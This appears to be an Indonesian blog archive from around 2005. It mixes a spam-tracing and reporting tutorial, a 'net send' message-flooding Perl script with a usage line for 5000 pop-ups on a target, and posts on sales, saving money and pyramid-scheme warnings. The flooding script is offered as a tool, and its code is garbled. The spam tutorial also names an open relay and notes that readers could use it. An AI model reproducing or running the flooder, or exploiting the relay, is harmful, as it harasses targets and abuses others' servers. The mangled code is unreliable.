>Date: Sun, 31 Oct 1999 17:01:17 -0500
>Content-Type: text/plain; charset="iso-8859-1"
>Message-Id: <199910312356876.SM01216@fij909>
>Content-Transfer-Encoding: 8bit
>X-MIME-Autoconverted: from quoted-printable to 8bit by smv15.iname.net id
>RAA22733
----------------------------------------------------

Tampak seseorang dengan IP 38.26.242.169, menggunakan mail server
data99.cz, atau aliasnya adalah www.data99.cz , dengan IP mail server itu
adalah 193.179.185.105 yang open relay untuk menyepamm saya.
orang itu pakai outlook express dari mikocok untuk nyepamm saya.

Nah contoh ini jelas, mail server data99.cz harusnya tidak boleh open relay
, tapi dia ternyata bisa dipakai oleh orang yang tidak dalam satu sub net
block 193.179.x.x nya, yaitu dari 38.26.242.169 , maka ini open relay.
Anda pun juga bisa menggunakannya,selama mail server tadi belum diperbaiki
oleh adminnya.

Nah siapakah orang dengan IP 38.26.242.169 tadi ?
Mudah, kita lookup, maka hasilnya adalah
-----------------------------------
Host name: ip169.providence11.ri.pub-ip.psi.net
IP address: 38.26.242.169
Alias(es): None
-----------------------------------

Ups, dari psi.net juga, dia lokasinya bahkan sangat jelas, dia berada di
kota providence, yang berada di state RI (rhode Island) di Amerika.

So, mudah, tinggal saya komplain lagi ke abuse@psi.net , maka.......
biarkan orang psi.net membereskan spammer tadi.

-----------------------------------------------
Setelah jelas mengenai 2 jenis metode spamming yaitu direct to MX spamming
dan spamming melalui mail server yang open relay, maka kita bisa lanjut ke
lesson berikut


7. Bagaimana cara melacak spammer ?
Anda bisa melacaknya melalui IP yang digunakan, karena 98% kasus spamming,
maka IP address yang digunakan spammer tadi pasti akan masuk di header, dan
anda dapat melacaknya.
Kuncinya adalah anda HARUS dapat melihat full header dari message tadi,
kalau di hotmail misalnya pilih options lalu preferences, lalu pilih pada
bagian show header : full header.
Di yahoo mail sama juga, kalau anda pakai Eudora, anda tinggal klik tombol
blah blah blah button di sebelah kiri atas, kalau anda pakai mikocok
outlook express bagaimana ? Nah itu anda temukan sendiri saja, soalnya saya
tidak pernah dan tidak akan pernah pakai outlook express.

Memang ada beberapa mail server di internet yang saya tahu, yang anonymous,
bahkan di Indonesia ada juga, milik salah satu bank, dimana jika IP address
anda TIDAK akan muncul di header, yang muncul hanyalah begini misalnya

Received: from suatubank.co.id by suatubank.co.id with SMTP
.......................
harusnya kan muncul nya begini
Received: from testing[202.147.xxx.xxx] by suatubank.co.id with SMTP
...........

testing adalah kata yang saya isikan pada pada saat HELO
jadi begini, kalau anda telnet port 25, suatu mail server, lalu pas
HELO , anda isikan misalnya kucingku
Maka yang akan tampil di header adalah :
Received: from kucingku[IP ANDA SAAT ITU] by mailserver.yang.anda.gunakan
with SMTP .........

Nah setelah anda dapatkan IP si spammer, maka anda bisa mencoba untuk
lookupnya, misalnya di linux pakai $ dig -x IP atau di windows anda bisa
cari utility netlab di tucows (www.tucows.com)

8. Apa yang harus saya lakukan selanjutnya jika saya menerima spamm ?
Seperti yang telah ditulis di atas, anda dapat langsung mendeletenya, tapi
diharapkan anda setelah membaca surat ini, tolong jangan didelete begitu
saja spammnya, tapi anda sebaiknya ikut untuk menghentikan aksi keganasan
spammer ini

Untuk jenis Direct to MX spamming, anda cukup laporkan ke
abuse@provider.yang.digunakan.si.spammer
tapi untuk jenis yang open relay spamming, anda tolong forward spamm tadi ke
relays@mail-abuse.org , dan relays@orbs.org
pada body nya, anda tulis

Relay: xxx.xxx.xxx.xxx
xxx.xxx.xxx.xxx adalah IP dari mail server yang open relay.

ingat, jangan sampai salah tulis dengan
relay : xxx.xxx.xxx.xxx , karena messagenya anda akan dibalikin.

Ini adalah langkah untuk membatasi ruang gerak si spammer, sehingga dengan
demikian si spammer akan lebih sulit untuk beraksi.

--
Jika anda seorang admin mail server, selain set mail server anda agar tidak
open relay, tolong juga anda subscribe DUL, RSS dan RBL dari
http://www.mail-abuse.org , dan http://www.orbs.org selain untuk melindungi
langganan anda dari spam, juga untuk semakin membatasi ruang gerak spammer.

DUL -> Dial Up user List adalah layanan untuk memblock adanya Direct to MX
spamming ke mail server anda
RSS -> Relay Spamm Stopper adalah layanan untuk memblock email yang berasal
dari mail server yang open relay.
RBL -> Real Time Black Hole List adalah layanan untuk memblock email dari
site site yang selain open relay, juga site lain yang terlibat kasus serius.

--------

References :
1. http://www.mail-abuse.org
2. http://www.orbs.org
3. http://www.cauce.org
4. http://www.spamcop.net
5. pengalaman lah !

PS: jika ada yang ingin ditanyakan lebih lanjut, bisa mengirimkannya ke
alamat saya irwanhadi@iname.com, dan mohon agar tutorial ini dibaca
terutama bagi mereka yang masih buta urusan spam , agar tidak bingung terus.
DIEDARKAN OLEH VLSM PEMULA 2000 www.pemula.com
dikutip dari hackerlink
Read rest of entry

Kamis, Februari 24, 2005

Hukum 250

Hukum 250


Dear Rekans,

Sekali lagi tentang pak Joe Girard, si sales mobil.

Begini ceritanya:
Dalam karirnya sebagai sales, beliau menemukan kenyataan unik yang membantunya mengembangkan branding sebagai salesman terpercaya, yang
kalo dipikir2 ya.. biasa aja, tapi kenapa bisa luput ya dari pengamatan orang-orang kebanyakan ..

Ini pengamatannya:

Di kotanya, setiap individu paling gak mengenal atau dikenal oleh 250 orang lainnya (bagaimana pak Joe mendapatkan angka 250 merupakan
cerita tersendiri, cukup panjang, ntar bosen).

Kalau di lingkungan kita mungkin angkanya beda ya? tapi intinya setiap individu yang normal pasti punya kenalan yang cukup banyak.
Hubungannya dengan usahanya pak Joe seperti apa?

Begini,
Kalau ada pebisnis yang mengecewakan pelanggan, kira2 apa akibatnya?

Pertama, pelanggan yang kecewa tadi akan cerita ke keluarganya tentang kekecewannya pada pebisnis itu
Besoknya di akan cerita ke teman2 kantor tentang kekesalannya. Pada saat lari pagi di boulevard, ketemu tetangga dan keluar lagi
cerita tentang kejengkelannya .. dst dst
ditambah lagi: keluarga/rekan kerja/tetangga akan cerita juga kpd teman/rekan/handai tolan dengan lebih mendramatisir keadaan

maka tersebarlah dengan cepat berita tentang betapa brengseknya usaha pebisnis itu tadi .. dalam sekejap, hancurlah reputasi pebisnis tadi di mata banyak orang hanya gara2 seorang pelanggan yang kecewa

Kalau sebaliknya, kita memberikan pelayanan yang istimewa kpd setiap pelanggan.
Dengan efek yang sama, keistimewaan usaha kita akan cepat tersebar juga ..

(.. eh, bakso di ruko sana enak deh, tempatnya sejuk gak sumpek, pelayanannya cepat, kasirnya apalagi .. cantiknya ..ruarrr biasa.. (dasar !))

Oleh pak Joe hal ini dinamai "hukum 250"

Bottom line:
Kalau dihadapkan pada kondisi antara merugi sedikit vs mengecewakan seorang pelanggan, ingatlah saya .. eh .. ingatlah pak Joe dengan hukum 250nya. Sekali seorang pelanggan kecewa, ingatlah besok akan ada sekian orang yang gak mau lagi berhubungan bisnis dgn anda ..

Kalau dihadapkan pada pilihan memberikan pelayanan seadanya vs pelayanan istimewa, ingat juga hukum 250 pak Joe. Setiap pelanggan berpotensi menjadi wasilah/perantara bagi sekian banyak pelanggan baru yang tentu akan lebih menggembungkan pundi2 anda.

semoga bermanfaat
Read rest of entry

Rabu, Februari 23, 2005

Netsendz bomber -ECHO-

#!/usr/bin/perl -w
#!C:\Perl\bin\perl.exe -w
############################################

############################################
# #
# By using this code you agree to indemnify rootsecure.net #
# from any liability that might arise from its use. #
# #
# Also you agree not to use it for the purpose of advertising #
# any product, brand or service. #
# #
############################################

$message_text = "spam";
$first_x2_ip = "127.0";


for ($countb=0; $countb<257; counta="1;" send_message_to = "$first_x2_ip.$countb.$counta" send_message_to =" $message_text">
Start>Run>command>
Microsoft(R) Windows DOS
(C) Copyright Microsoft Corp 1990-2001

C:\DOCUME~1\Y3DIPS>

Cat: aku coba ini pada microsoft windows XP
ketik net send

C:\DOCUME~1\Y3DIPS>net send
The syntax of this command is:

NET SEND
message

mari kita lakukan..
C:\NET SEND 127.0.0.1 hallo
(127.0.0.1, ip tujuan, karena aku lakukan dg standalone jadi aku pake
loopback address)

apabila berhasil akan tampak pada:
pc target (127.0.0.1): sebuah pop up message box berisi

-------------------------------------------------------------
Messenger service X
-------------------------------------------------------------
Message from Y3DIPSPC to 127.0.0.1 on 11/4/2003 7:05:55 PM
hallo ____
ok
----
-------------------------------------------------------------


pada pc pengirim
The message was successfully sent to 127.0.0.1.

ENough for ?NEt SEnd!

*Sekarang kita bahas Exploitsnya:
Apa yang di perlukan, sebuah compiler untuk mengeksekusi exploits tsb,
yang pasti adalah, kita butuh compiler untuk perl, kenapa? karena
program tersebut ditulis dengan bahasa pemrogaman perl , perl? << message_text = "spam" first_x2_ip = "192.168" message_text= "hallo_sayang" first_x2_ip="127.0" countb="0;" counta="1;" send_message_to = "$first_x2_ip.$countb.$counta" pemrograman =" terus" argv ="=" pesan =" $ARGV[0];" ip =" $ARGV[1];perl" jumlah=" $ARGV[2];" awal="0;" mengirimke = "$ip" mengirimke =" $pesan" pesan =" <" ip =" > & kirim

dan aku juga tambahkan contoh, jika anda gak tau harus ngapain?....
kalo ngetik perl netsnd.pl doangan..
bakal muncul
[Gunakan] .. perl netsnd.pl [tulis_pesan][host][jumlahx]
so kamu bisa pakai;
c:\perl netsnd.pl hallo_sayang 192.168.0.1 5000
selanjutnya yang terjadi seperti diatas,bedanya pada pc target muncul
5000 buah message box.. :)
Read rest of entry

Babylon Evil!

BAGIAN PERTAMA: EMPAT PILAR BERPIKIR

1. FOCUS: ‘DARI ORANG TERKAYA DI BABYLONIA’

Pernahkah Anda mengalami hal seperti ini: Anda mengalami minggu yang sangat sibuk. Jadwal Anda telah tersusun dengan sangat padat, sehingga cukup mengherankan bahwa masih ada waktu untuk bernafas. Beberapa orang yang mencoba membuat janji dengan Anda harus Anda tolak karena tidak ada waktu lagi.

Kemudian tiba-tiba Anda menerima telpon dari seorang teman lama yang tinggal di kota lain. Sudah cukup lama kalian tidak bertemu dan ia kebetulan sedang mengadakan kunjungan singkat ke kota Anda. Ia mengajak untuk bertemu pada suatu waktu yang ditentukan. Ia juga telah menghubungi teman-teman lama yang lain sehingga pertemuan ini akan menjadi suatu reuni kecil-kecilan.

Anda melihat kembali ke dalam agenda. Setelah mempertimbangkan berbagai kemungkinan, Anda lalu menelpon beberapa orang untuk membatalkan atau mengubah janji. Tiba-tiba Anda mempunyai waktu untuk diberikan bagi teman Anda.

Pernahkah hal ini terjadi? Atau hal yang serupa dengan itu?

Yang terjadi sebenarnya adalah: pada saat seseorang berkata, “Saya tidak punya waktu untuk melakukan ‘X’, ia sebenarnya berkata, “Saya tidak menaruh ‘X’ dalam prioritas saya”.

Pada jaman sekarang ini, sering kita mendengar orang berkata “Saya tidak punya cukup waktu. Dua puluh empat jam sehari tidak cukup”. Kita melihat laju kehidupan yang sangat tinggi di kota besar. Setiap orang bergegas, mengebut dalam berkendara, dan enggan untuk antri. Adalah suatu kontradiksi yang sangat menarik, bahwa saya telah bertemu dengan banyak orang yang juga berkata, ”Saya tidak tahu apa yang harus saya lakukan sepulang kerja”.

Di satu sisi, tidak ada cukup waktu. Di sisi lain, waktu berlimpah, sehingga orang tidak tahu lagi apa yang harus dikerjakan untuk menghabiskan waktunya sepulang kerja. (Alasan mengapa orang menjadi workaholic?)

Sekali lagi, ini adalah masalah prioritas. Jika melakukan ‘X’ tidak ada dalam prioritas kita (karena hal itu tidak menyenangkan), maka kita tidak akan pernah punya waktu untuk melakukan ‘X’, bahkan ketika kita bingung harus melakukan apa untuk menghabiskan waktu.

Sebenarnya, pada bahasan yang lebih mendalam (daripada sekedar masalah prioritas), kontradiksi ini sebenarnya bisa merupakan gejala dari tidak adanya impian:

yang dikejar
yang dipercayai bisa dicapai dalam kurun waktu tertentu
Saya akan membahas ini secara tersendiri dalam bagian kedua dari milis ini, setelah potongan puzzlenya telah saya berikan secara lengkap.

Seperti halnya waktu, uang juga merupakan sumber daya yang terbatas. (paling tidak, bagi sebagian besar dari kita) Jadi kalau kita berkata “Saya tidak punya kelebihan uang untuk berinvestasi/membangun asset”, sebenarnya kita berkata bahwa membangun asset tidak ada dalam daftar prioritas kita saat ini.

[Contoh] ‘P’ adalah seorang mahasiswa. Saat ditanya soal berinvestasi, jawabannya bisa seperti berikut:

- “Wah, saya khan belum bekerja. Masih mengandalkan uang saku dari orang tua.

Nantilah, setelah saya bekerja.”

- Setelah P lulus dan mendapat pekerjaan pertamanya, “Saya masih mau bersenang-senang dan menikmati hidup. Saya masih muda, tidak mau ambil pusing memikirkan hal-hal finansial seperti itu. Nanti, beberapa tahun lagi saya akan melakukannya”

- Beberapa tahun kemudian….”Saya ingin membangun asset dan berinvestasi. Tapi kebutuhan saya banyak sekali, saya akan segera menikah”

- Dan beberapa tahun lagi….”Sebenarnya sih, saya kepingin. Tapi biaya hidup sekarang tinggi sekali. Saya baru saja dikaruniai seorang anak. Tahukah Anda berapa mahalnya biaya melahirkan sekarang?”

- Dan kemudian…”Wah bagaimana ya? Soalnya anak saya akan segera bersekolah. Kelihatannya pengeluaran saya akan menjadi pas dengan apa yang saya dapatkan. Darimana lagi saya bisa menyisihkan uang untuk berinvestasi?”

Selama Anda tidak menaruh sesuatu dalam prioritas Anda, selalu akan ada hal lain, alasan lain, mengapa hal itu tidak bisa dilakukan.


Dalam bukunya yang sangat laris terjual, ‘Orang Terkaya di Babylonia’, George Clason mengajarkan prinsip-prinsip pengelolaan uang. Saya merekomendasikan Anda untuk membaca buku ini. Bahkan jika Anda tidak suka membaca, buku ini akan menarik bagi Anda, karena prinsip-prinsipnya diajarkan dalam bentuk cerita.

Salah satu prinsip dalam buku ini adalah: sisihkanlah selalu sebagian dari penghasilan Anda, katakanlah 10%. Jangan pernah menghabiskan seluruh penghasilan Anda.

Untuk apa?

Kita tidak pernah tahu, kapan kesempatan untuk berusaha/berinvestasi akan muncul. Namun, lebih sering daripada tidak, saat kesempatan itu muncul, akan ada modal yang harus kita miliki. Inti dari selalu menyisihkan sebagian dari penghasilan kita adalah agar kita siap, saat kesempatan itu muncul.

George Clason juga menulis bahwa, jika kita belajar menyisihkan 10% dari penghasilan kita, kita tidak akan merasakan perubahan yang berarti dalam kualitas (baca: gaya) hidup kita. Renungkanlah hal ini dalam keuangan pribadi Anda. Saya yakin bahwa 90 dalam 100 kasus, hal ini adalah benar.

Mungkin saat ini Anda benar-benar merasa tidak bisa menyisihkan apapun, misalnya karena Anda sedang mencicil rumah/mobil. Penghasilan dan pengeluaran benar-benar pas. Apa yang bisa Anda lakukan?

Tuliskanlah kapan Anda bisa memulai (tanggal yang tepat), yaitu saat cicilan itu selesai. Tuliskanlah berapa banyak yang bisa Anda sisihkan mulai tanggal tersebut. Ini sangat penting.

The mere act of writing something down gives additional commitment to actually do it when the time comes.

Apa lagi yang bisa Anda lakukan dalam hal ini?

Tetaplah buka mata dan telinga Anda lebar-lebar terhadap kesempatan-kesempatan yang ada. Tetaplah mencari informasi bagi kemungkinan-kemungkinan usaha/berinvestasi yang ada.

Mengapa?

Jika Anda sungguh-sungguh melihat suatu peluang yang sangat bagus, Anda bisa menjadi sangat antusias. Tiba-tiba secara ajaib akan ada jalan untuk mempercepat mulainya pembangunan asset Anda. Tiba-tiba prioritas Anda berubah. Antara lain, Anda bisa:

- menekan pengeluaran Anda (karena pengeluaran tertentu sekarang kalah prioritas dibandingkan dengan memulai membangun asset dengan peluang yang sangat bagus ini)

- menambah penghasilan Anda (kerja tambahan yang Anda tidak sukai? Mungkin akan Anda lakukan untuk sementara untuk bisa menangkap peluang ini)

Sekali lagi, semuanya adalah masalah PRIORITAS.

Ingatlah, ada perbedaan yang sangat besar antara nol dan bukan nol. Nol dikali berapapun selalu nol. Sebaliknya bahkan jika Anda hanya bisa menyisihkan jumlah yang kecil dan tidak berarti, dalam jangka waktu panjang, akumulasinya akan sangat jauh dari titik nol.

Tentu ada pengecualian bagi bahasan di atas.

Saya juga sering mendengar orang berkata “Tapi, apa gunanya punya banyak asset dan uang, kalau kita tidak menikmati hidup, kalau kita (sedikit) mengencangkan ikat pinggang. Bukankah uang juga ada untuk dinikmati? Mengapa saya harus bersusah-susah menyisihkan uang?”

Tidak untuk seterusnya hal ini harus Anda lakukan. Ini hanyalah langkah awal untuk memulai permainan. The real game hasn’t begun yet.

Pernahkan anda mendengar tentang John D. Rockefeller? Ia adalah salah seorang terkaya yang pernah hidup. Pada tahun 1913, kekayaannya ditaksir bernilai 900 juta dollar. (Mungkin Anda dapat menghitung, berapa miliar dollar equivalentnya pada tahun 2005 ini)

Rockefeller juga mulai dengan menyisihkan uangnya. Selanjutnya?

Saya akan membahas hal ini secara lebih lengkap pekan depan (termasuk juga pengecualian bagi bahasan di atas. Dapatkah Anda menebak pengecualian ini?). Kita akan mengikuti jejak Rockefeller. Kita akan mulai dengan menyisihkan uang, lalu membangun asset “SEBAGAIMANA ROCKEFELLER MELAKUKANNYA”.


***************************************************

2. HEDGING, ASURANSI DAN INVESTASI(2)

Kita telah membahas bagaimana menggabungkan asuransi dan investasi sebenarnya merupakan suatu strategi hedging. Dalam ezine edisi I, saya memberikan contoh hal ini bagi kasus seorang karyawan. Berikut adalah contoh lainnya.

[CONTOH2] ‘R’ adalah seorang milyarder muda. Dari assetnya yang bernilai 1 milliar, setiap tahun ia bisa mendapatkan return 30%. Ia bisa memilih untuk melakukan 1 dari kedua hal berikut:

- menambahkan seluruh return 30% ke dalam assetnya. (berarti 300 juta dalam tahun pertama) Tahun demi tahun, hal ini terus terjadi dan ia akan mempunyai nilai kekayaan yang luar biasa.

- Membagi returnnya sebagai berikut: 60 juta rupiah per tahun disisihkannya untuk asuransi/investasi, sisanya (berarti 240 juta dalam tahun pertama) tetap ditambahkan ke dalam assetnya.

Sekali lagi, strategi kedua merupakan hedging. Tentunya melakukan pilihan kedua akan memberikan nilai kekayaan dibawah pilihan kesatu, tetapi ‘R’ akan terjamin, ke arah manapun angin berubah. Situasi baik ataupun jelek. Sakit ataupun sehat.

Apa bedanya dengan seorang karyawan? Banyak. Opportunity cost bagi seorang milyarder jauh lebih besar daripada karyawan. (Opportunity cost adalah biaya tidak nyata berupa hilangnya kesempatan untuk menghasilkan. Seorang milyarder yang bekerja dalam 1 jam dapat menghasilkan jauh lebih banyak dari seorang karyawan yang juga bekerja dalam 1 jam.)

Dengan asset 1 milyarnya, ‘R’ ibarat mempunyai seekor angsa yang bertelur emas baginya. (telur emasnya dalam hal ini adalah return 30%nya) Angsa inilah yang tidak dimiliki oleh karyawan. ‘R’ harus mencegah jangan sampai ia harus membunuh angsanya. Artinya? Ia harus mencegah jangan sampai sesuatu terjadi yang membuat ia membutuhkan cashflow dalam jumlah besar. Hal ini bisa berarti bahwa ia harus menjual asetnya, (jadi dalam hal ini, membunuh angsanya). Saya akan membahas angsa emas ini secara lebih detil pada e-zine edisi ke 7, saat saya membahas mengenai financial freedom.

Kira-kira hal buruk apa yang bisa membuat ‘R’ membutuhkan cashflow dalam jumlah besar (jadi, jumlah yang besar bahkan bagi seorang miliarder)? Banyak contoh, misalnya kebakaran yang melanda assetnya, atau sakit serius. Tidak ada limit bagi biaya yang harus dikeluarkan dalam hal ini. (Keluarga Sukma Ayu menghabiskan miliaran rupiah untuk biaya perawatan Sukma Ayu selama beberapa bulan)

Bagi seorang miliarder seperti ‘R’, menyisihkan sebagian kecil returnnya untuk melakukan hedging adalah ibarat menyisihkan sebagian kecil telur emasnya untuk membeli makanan terbaik dan menyediakan fasilitas terbaik bagi angsanya. Ia harus menjaga jangan sampai angsanya sakit atau mati.
Read rest of entry

Selasa, Februari 22, 2005

Arisan Buset Deh!!

Saya dikunjungi oleh seseorang via email, dan ketika saya buka email tersebut, tertulis:

Saya menawarkan kepada anda, sebuah program ARISAN ONLINE, yang baru diluncurkan tanggal 1 Januari 2005. Program ini sangat mudah dijalankan, sederhana systemnya, namun luar biasa hasilnya.
Inilah program yang Anda cari selama ini, program ARISAN ONLINE yang membuat uang mengalir ke rekening Anda. Kapan saja, dari siapa saja dan kapan saja.
Program ini terbukti ampuh, spektakuler dan begitu di minati di seluruh dunia.

Waduh, saya jadi ingat jaman SMP dulu dapat selebaran "AKSARA - Arisan Kejujuran dan SAmbung RAsa" dan beberapa waktu yang lalu arisan ini via email dan bahkan juga dikirim ke rumah via post, bayangkan 2 buah surat pos dari orang yang berbeda.

Namanya juga arisan, ya kita akan dapat 1 kali dalam 1 ronde pada dasarnya uang yang kita dapat prosentasenya sesuai dengan uang yang kita keluarkan dalam ronde tersebut tidak lebih. Sedangkan dalam AKSARA kita akan sulit mengenali batas-batas ronde dan membuat kita mendapat uang dari orang lain kemungkinannya berkali-kali...

Muncullah modifikasi via email, kemudian website yang menawarkan sistem network marketing seperti juga ARISAN ONLINE ini... be careful! jika kita diminta mengirimkan uang secara langsung kepada beberapa orang yang ditunjuk (istilah mereka adalah "sponsor") berarti kita juga "meminta" orang lain mengirimkannya kepada kita suatu saat nanti. padahal itu bukan pekerjaan kita.

Mendapatkan uang karena komisi adalah benar, tetapi mendapatkan uang karena meminta adalah salah. Tidak mendewasakan kita sama sekali, dan sama sekali tidak memiliki motif yang kuat, hanya untung-untungan saja. Lain halnya dengan komisi, adalah sesuatu yang berhak kita dapatkan oleh karena mempromosikan barang/jasa kepada orang lain, motifnya jauh lebih kuat.

Mendapatkan uang karena komisi biasanya mengutamakan penjualan produk (berupa barang/jasa), sedangkan mendapatkan uang karena "meminta" biasanya produk adalah hadiah, bukan barang jualan, ini baru boleh jika kita minta sumbangan lalu kita beri hadiah, tapi kalau sumbangan untuk diri kita... kasihan deh kita, masak menghidupi diri dari minta sumbangan ;)
Read rest of entry

Senin, Februari 21, 2005

Penipuan!! Spamer

Hari ini saya menerima 2 email yang mengajak saya ikut money game.

Yang pertama menawarkan program yang diberi nama BCA Internet Cash Generator, katanya cukup join dengan membayar Rp. 50.000 kepada sponsor, Rp. 25.000 kepada upline acak, dan Rp. 25.000 kepada pengelola. Total biaya Rp. 100.000,- harus dibayar segera, Setelah itu Anda cukup duduk diam menunggu uang datang karena secara acak Anda akan terpilih menjadi upline.

Ini jelas money game, sebuah modifikasi dari arisan berantai, arisan kejujuran, penipuan yang sangat ampuh untuk menjerat si tamak dan si pemalas.

Kamuflasenya adalah ebook dan cgi program yang antah berantah nilainya, dibeli dengan harga Rp. 100.000 untuk dijual kepada si pemimpi, pemalas dan penipu berikutnya yang tertarik menjadi kaya dalam tempo singkat, cukup menjual kepada 2 orang sudah balik modal, dan jika gagal menjual masih boleh berharap mendapat keberuntungan dari income sebagai sponsor acak.

Yang Kedua menawarkan investasi dengan iming iming bunga harian 0,5% atau 10% per bulan. Plus bonus referal, plus bonus langsung kijang inova kalau melakukan investasi besar, plus website referal, plus macam-macam yang hebat sekali. Memangnya si Fund Manager akan gunakan uang investasi itu untuk bisnis apa yang dapat memberikan keuntungan sampai diatas 50%? Bisnis Narkobapun mungkin tidak akan semudah itu.

Nampaknya masyarakat kita terlalu bodoh sehingga pelaku kejahatan semacam ini masih dapat leluasa gentayangan dan berhasil merekrut banyak pemimpi, pemalas atau penipu kelas bawah yang tega menjerumuskan temannya agar dia meraih keuntungan sebagai sponsor/referal.

Ataukah sesungguhnya masyarakat kita tidak bodoh, hanya sakit. Penyakit mental nan parah yaitu keinginan untuk segera meraih uang secara cepat tanpa berpikir panjang, termasuk tega menjerumuskan teman.

Sepertinya kemungkinan kedua ini yang lebih benar karena mereka yang pelaku utama atau pencetus gagasan dan yang kemudian join sehingga mengirimkan email kepada saya adalah para pengguna internet yang mengerti apa itu artinya cgi, ebook, fund manager, website referal dll. yang hanya dimengerti oleh yang sudah cukup banyak makan asam garam internet.

Waspadalah, jangan sampai Anda ikut dalam program tersebut, spam email akan Anda terima dalam waktu dekat, bahkan mungkin sudah Anda terima saat ini.

Anda ingin meraih sukses dalam Network Marketing atau Viral Marketing? Anda harus berjuang, Anda harus belajar dan Anda harus tekun, konsisten dalam waktu yang cukup panjang.

Tidak ada cara singkat dan mudah untuk mencapai sukses.

Hal paling utama yang harus Anda miliki adalah kemampuan melakukan kontrol terhadap diri sendiri.

Apakah Anda mampu membuat diri Anda mempunyai keinginan untuk terus menerus belajar? Jika Ya, maka Anda akan mencapai sukses.
Read rest of entry

Free Ebook

ebook social
http://fux0r.phathookups.com/textfiles/computer_culture/art%20of%20deception.DOC

ebook free
www.ebooknet.com
www.e-books.org
www.e-book.org
www.toptenlinks.com/Arts/Literature/Books/Stores/Ebooks/index.shtml
www.microsoft.com/reader
Read rest of entry
 

Chat With Girls

Sumber Dana

Term of Use

Semua bebas di copy paste tanpa syarat dan ketentuan apapun, semua artikel tidak perlu anda percaya anggap saja dongeng mitos atau apapun itu menurut anda. Karena jika anda percaya kehidupan anda akan berubah, perkumpulan rahasia or secret societies akan terus memburu anda dan berkata semua ini hanya kebohongan.
Copyright © 2004-2009 by Bisnis Manado